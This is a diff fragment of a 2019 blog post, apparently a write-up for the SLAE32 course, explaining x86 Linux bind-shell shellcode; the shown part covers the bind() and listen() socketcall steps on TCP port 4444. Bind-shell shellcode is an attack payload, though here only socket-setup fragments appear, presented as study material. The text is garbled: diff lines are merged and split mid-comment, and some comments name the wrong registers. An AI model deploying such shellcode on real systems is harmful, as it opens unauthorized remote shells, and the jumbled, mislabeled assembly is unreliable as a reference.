boku7/boku7.github.io/_posts/2019-09-15-SLAE32_1_BindShell.md

 push word 0x5c11  ; ARG[1].
 This is for the TCP Port 4444.
 push bx           ; ARG[0].
 Push the value 2 onto the stack, needed for AF_INET. xor ecx, ecx      ; This sets the EAX Register to NULL (all zeros). mov ecx, esp      ; Save the memory location of ARG[0] into the EDX Register.
-We will use this for ECX[1]. push 0x10         ; ECX[2].
-Our Struct of ARG's is now 16 bytes long (0x10 in Hex). push ecx          ; ECX[1].
-The pointer to the beginning of the struct we saved is now loaded up for ECX[1]. push esi          ; ECX[0].
-This is the value we saved from creating the Socket earlier. mov ecx, esp      ; Now all that is left is to point ECX to the top of the loaded stack and let it do it's thing. int 0x80          ; System Call Interrupt 0x80 - Executes bind().
-Connecting our Socket to the TCP-IP Address.
+                  ;   We will use this for ECX[1]. push 0x10         ; ECX[2].
+Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
+push ecx          ; ECX[1].
+The pointer to the beginning of the struct we saved is now
+                  ;   loaded up for ECX[1].
+push esi          ; ECX[0].
+This is the value we saved from creating the Socket earlier. mov ecx, esp      ; Now we need to point ECX to the top of the loaded stack. int 0x80          ; System Call Interrupt 0x80

 ; 4.
 Listen for incoming connections on TCP-IP Socket.
 ; <socketcall>   listen( ipv4Socket, 0 );
 ;   EAX=0x66      EBX      ECX[0]   ECX[1]
 xor eax, eax     ; This sets the EAX Register to NULL (all zeros). mov al, 0x66     ; EAX is now 0x00000066 = SYSCALL 102 - socketcall xor ebx, ebx     ; This sets the EBX Register to NULL (all zeros).